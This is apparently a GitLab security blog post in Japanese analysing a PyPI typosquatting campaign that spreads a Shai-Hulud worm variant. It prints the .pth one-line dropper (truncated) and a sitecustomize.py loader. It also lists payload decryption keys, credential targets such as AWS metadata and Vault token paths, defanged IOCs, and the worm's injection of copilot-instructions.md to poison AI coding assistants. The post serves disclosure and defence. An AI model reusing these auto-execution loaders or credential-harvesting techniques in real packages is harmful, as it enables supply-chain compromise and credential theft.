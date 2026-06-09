更新日：2026年6月10日
12分で読めます
GitLabの脆弱性リサーチチームが、PyPIを標的とした新たなPythonサプライチェーン攻撃を発見しました。悪意あるパッケージがShai-Huludワームを展開し、主要なクラウドプロバイダーのCI/CDシステムから認証情報を窃取します。
GitLabの脆弱性リサーチチームは、PyPIを標的とした組織的なサプライチェーン攻撃を確認しました。この攻撃では、Shai-Huludマルウェアのコピーが展開されています。悪意あるパッケージは5つ確認されており、Flask、Requests、NumPyを偽装したタイポスクワット4つと、武器化された正規プロジェクト1つが含まれます。これらのパッケージはインストール時にコードを実行し、インポートや関数呼び出しは不要です。また、自己増殖型の認証情報窃取ツールを内包しており、主要クラウドプロバイダー全般のCI/CD環境を標的としています。
GitLabが影響を受けるパッケージをいずれも使用していないことを確認しました。より広範なセキュリティコミュニティが適切に対応できるよう、調査結果を公開します。
監視システムは、2026年6月7日、単一アカウント（
elitexp）から公開された悪意ある5つのPyPIパッケージを検知しました。そのうち4つはタイポスクワットです。
rlask と
tlask：Flaskのタイポスクワット
rsquests：Requestsのタイポスクワット
nhmpy：NumPyのタイポスクワット
5つ目の
mflux-streamlit は、実際のユーザーを持つ正規プロジェクトです。攻撃者はタイポスクワット展開後、悪意あるバージョン0.0.3および0.0.4を公開することで、このプロジェクトを武器化しました。
攻撃者はまず、本物の最新リリースのバージョン番号（Flask 3.1.3、Requests 2.34.2、NumPy 2.4.6）と完全に一致するクリーンな「プローブ」バージョンを公開しました。これらが問題なくインデックスされると、攻撃者はワームのペイロードを組み込んだ新しいバージョンを公開しました。
これは模倣による展開です。Shai-Huludの背後にある集団TeamPCPは、2026年5月12日にワームのコードをオープンソース化しました。以来、独立した攻撃者がこのツールキットを入手し、新たなターゲットを狙う動きを追跡してきました。今回のキャンペーンにより、同じワームがPythonエコシステムへも展開されました。
元のnpmバリアントは
preinstall スクリプトを使用していました。このキャンペーンでは別のアプローチを採用し、Pythonの
.pth ファイルメカニズムを悪用しています。Wheelパッケージは
.pth ファイルを同梱でき、Pythonは起動時にこれを自動的に処理するため、明示的なインポートは不要です。各悪意あるパッケージには
rlask-setup.pth のようなファイルが含まれており、1行のドロッパーが記述されています。
import os as _O,tempfile as _T;_G=_O.path.join(_T.gettempdir(),".bun_ran");
_O.path.exists(_G)or exec('import os as _o,subprocess as _s,urllib.request as _u...')
ドロッパーはシステムの一時ディレクトリ内のマーカーファイル（
.bun_ran）の存在を確認して再実行を防ぎ、次にGitHubからBun JavaScriptランタイムをダウンロードし、パッケージ内にバンドルされた5 MBの難読化されたJavaScriptペイロードを実行します。
rlask の初期バージョンには、バックアップの実行経路として
sitecustomize.py ファイルも含まれていました。Pythonは起動時に
sitecustomize を自動インポートし、このファイルは
sys.path から隠し
_index.js ペイロードを検索します。
import subprocess, os, sys
for d in sys.path:
js = os.path.join(d, "_index.js")
if os.path.exists(js):
subprocess.run(["node", js])
break
攻撃者は後のバージョンでこのバックアップメカニズムを削除し、
.pth アプローチ単独で十分と判断したようです。
JavaScriptペイロードは3層で難読化されています。
[email protected] はROT-13、
rsquests はROT-17、
tlask はROT-25）
_0x プレフィックス難読化）
コードを実行することなく、静的解析によってペイロードを復号しました。最初のブロブ（907バイト）はBunランタイムダウンローダーです。2番目のブロブ（772 KB）は完全なShai-Hulud認証情報窃取ツールで、2,538個のハードコードされた文字列を含んでいます。
独自に解析を行う研究者向けに、AES復号鍵を以下に示します。
|レイヤー
|鍵
|IV
|Bunダウンローダー
c95506221d18936328fbc7ddcd21e3dd
48da5faeafac0ac88a410bb0
|ワームペイロード
7557c4e782a0622159476d1ea10d5236
55a7d25e0e61b77cc175bcc3
起動後、ワームは主要なクラウドおよびCI/CDプラットフォーム全般の認証情報を狙います。
GITHUB_TOKEN、パーソナルアクセストークン、きめ細かいトークン、OIDCトークン、組織・リポジトリのシークレット、Actionsアーティファクト、Runnerプロセスメモリ
169[.]254[.]169[.]254）、Secrets Managerエントリ、SSMパラメータ、STS連携トークン
/var/run/secrets/vault-token、
/etc/vault/token、
/root/.vault-token など）からのVaultトークン、APIアクセス、Kubernetes Vault認証
元のnpmバリアントと同様に、これは単なる窃取ツールではありません。自己増殖します。窃取した認証情報を使用して、ワームは以下の動作を行います。
.github/setup.js とワークフローファイルをコミットし、他のCIパイプラインでワームを再実行させます
.github/copilot-instructions.md を注入してAIコードアシスタントを汚染します
5つのパッケージはすべてPyPIアカウント
elitexp が所有しています。このアカウントは2024年11月に正規パッケージ（
mflux-streamlit：GitHubに11スターを持つStreamlit製画像生成UI）とともに作成されました。関連するGitHubアカウント（
github[.]com/elitexp）は13年以上前に作成されており、大学のコースワークやLaravelプロジェクトを含む43の公開リポジトリを持っています。
アップロードメタデータによると、すべてのパッケージはユーザーエージェントとして
Bun/1.3.14 を使用して公開されています。これはマルウェアが実行チェーンの一部としてダウンロードするランタイムと同じです。
攻撃者は
mflux-streamlit 自体も武器化しました。バージョン0.0.1と0.0.2はクリーンですが、タイポスクワットキャンペーンの後、15:23と15:37 UTCに公開された バージョン0.0.3と0.0.4 には、同じ
.pth ドロッパーと難読化されたペイロードが含まれています。これにより、典型的なタイポスクワットよりも危険な攻撃となっています。
mflux-streamlit は既存ユーザーを持つ実在のプロジェクトであり、これらのユーザーは通常の依存関係解決を通じて汚染されたアップデートを受け取る可能性があります。
|種別
|インジケーター
|説明
|package
rlask 3.1.4-3.1.7
|悪意あるFlaskタイポスクワット
|package
tlask 3.1.4
|悪意あるFlaskタイポスクワット
|package
rsquests 2.34.3
|悪意あるRequestsタイポスクワット
|package
nhmpy 2.4.7
|悪意あるNumPyタイポスクワット
|package
mflux-streamlit 0.0.3, 0.0.4
|武器化された正規パッケージ
|file
{package}-setup.pth
|自動実行ドロッパー（SHA256:
6506d317...）
|file
sitecustomize.py
|バックアップ自動実行（
rlask のみ存在）
|file
{package}/_index.js
|難読化されたワームペイロード（5.2 MB）
|file
.bun_ran
|システム一時ディレクトリ内の実行マーカー
|network
hxxps[://]github[.]com/oven-sh/bun/releases/download/bun-v1.3.13/bun-{os}-{arch}.zip
|Bunランタイムのダウンロード
|network
hxxps[://]upload[.]pypi[.]org/legacy/
|ワームによる汚染PyPIパッケージの公開
|network
hxxp[://]169[.]254[.]169[.]254/latest/meta-data/iam/security-credentials/
|AWS IMDS認証情報の窃取
|network
hxxps[://]login[.]microsoftonline[.]com/
|Azure ADトークンの取得
|network
hxxps[://]fulcio[.]sigstore[.]dev
|Sigstore証明書のリクエスト
|actor
elitexp (PyPI)
|パッケージ所有者
|actor
Bun/1.3.14
|アップロード時のユーザーエージェント
これらのパッケージのいずれかがお使いの環境にインストールされている場合：
.bun_ran マーカーファイルを確認してください。
.github/setup.js、
.github/copilot-instructions.md、または変更されたワークフローファイルに一致するもの）を監査してください。
|日時
|イベント
|2026-05-12
|TeamPCPがShai-Huludワームをオープンソース化
|2026-06-07 13:47 UTC
|プローブバージョン公開（
[email protected]、
[email protected]）
|2026-06-07 14:20 UTC
|最初の悪意あるバージョン（
[email protected]）を28秒以内に検知
|2026-06-07 14:24 UTC
|自動解析完了、悪意あり/重大として分類
|2026-06-07 14:27-15:04 UTC
|4つのパッケージ名全体でさらに6つの悪意あるバージョンが公開
|2026-06-07 15:23-15:37 UTC
|攻撃者が自身の正規パッケージ
mflux-streamlit を武器化（v0.0.3、v0.0.4）
|2026-06-07
|静的解析により完全なShai-Huludワームを確認
|2026-06-07 16:01 UTC
|すべての悪意あるパッケージをPyPIセキュリティチームに報告
|2026-06-08 03:15:06 UTC
|GitLab Advisory Databaseにアドバイザリを追加
|2026-06-08
|PyPIが悪意あるパッケージのすべてのリリースを削除
GitLab Ultimateをご利用の場合、Dependency Scanningを使用して、プロジェクト内のこれらのパッケージへの露出を自動的に検出できます。GitLab Advisory Databaseに、5つのパッケージすべてを対象とするアドバイザリ（GMS-2026-572〜GMS-2026-576）を申請しています。マージされると、Dependency Scanningが有効なプロジェクトのパイプライン結果と脆弱性レポートにこれらのパッケージがフラグ表示されます。
複数のリポジトリを管理するチームには、Security Analyst Agentを備えたGitLab Duo Chatを使用した迅速なトリアージをお勧めします。次のような質問を試してください。
TeamPCPが5月にShai-Huludワームをオープンソース化した後、このキャンペーンを予測していました。独立した攻撃者がツールキットを入手し、新たなエコシステムに展開しています。Pythonバリアントは異なる初期感染ベクター（
preinstall スクリプトではなく
.pth ファイル）を使用していますが、同じ認証情報収集および自己増殖のコードを内包しています。
監視システムはnpm、PyPI、その他のレジストリ全般での模倣展開を継続して追跡しています。新たな情報が入り次第、この記事を更新します。
脆弱性リサーチチームのその他の記事は、Security Labsサイトでご覧いただけます。
このブログ記事を楽しんでいただけましたか？ご質問やフィードバックがあればお知らせください。GitLabコミュニティフォーラムで新しいトピックを作成してあなたの声を届けましょう。フィードバックを共有する
今すぐ開発をスピードアップ
DevSecOpsに特化したインテリジェントオーケストレーションプラットフォームで実現できることをご確認ください。